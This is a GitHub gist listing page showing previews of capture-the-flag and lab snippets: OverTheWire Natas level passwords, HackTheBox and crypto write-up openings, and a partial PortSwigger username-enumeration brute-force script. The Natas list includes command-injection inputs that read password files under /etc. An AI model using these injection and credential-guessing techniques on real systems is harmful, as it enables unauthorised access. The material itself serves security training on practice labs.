Skip to content

Instantly share code, notes, and snippets.

View heapbytes's full-sized avatar
🚩
capturing flags

heapbytes

🚩
capturing flags
122 followers · 48 following
View GitHub Profile
@heapbytes
heapbytes / flags.md
Last active November 16, 2021 16:49
Over the wire - Natas
  • natas2 - ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
  • natas3 - sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
  • natas4 - Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
  • natas5 - iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
  • natas6 - aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
  • natas7 - 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
  • natas8 - DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
  • natas9 - W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
  • natas10 - nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu [word; cat /etc/natas_webpass/natas10 ]
  • natas11 - U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK [ .* /etc/natas_webpass/natas11 ]
@heapbytes
heapbytes / writeup.md
Last active November 21, 2021 16:58
AthackCTF Crypto challenge

Challenge Files:

Script

def my_function(x):
    return pow(x,3)+10*pow(x,2)+x*7 + 6

plaintext = "<censored>"
@heapbytes
heapbytes / writeup.md
Created November 29, 2021 07:34
Shibboleth ( Medium ) HackTheBox [ Walkthrough ]

Machine name - Shibboleth ( HackTheBox )

image

Nmap Scan

└─$ nmap -p- -sC -sV shibboleth.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 09:37 IST
Nmap scan report for shibboleth.htb (10.129.99.116)
@heapbytes
heapbytes / pwn.py
Last active August 25, 2022 08:27
TryHackme Hacker Vs Hacker exploit script
import requests
import sys
import subprocess
import paramiko
import os
import time
from pwn import *
#import socket
#from termcolor import colored
@heapbytes
heapbytes / img.md
Created July 30, 2023 19:07
vitunix i3

#vitunix i3

image

@heapbytes
heapbytes / solve.py
Created November 13, 2023 16:45
portswigger - Lab: Username enumeration via different responses
import requests
url = 'https://0a1500720486644082cc1618002c003c.web-security-academy.net/login'
users = open('users.txt', 'r').read().splitlines()
passwords = open('passwd.txt', 'r').read().splitlines()
for username in users:
data = {'username': username, 'password': 'password'}
r = requests.post(url, data=data)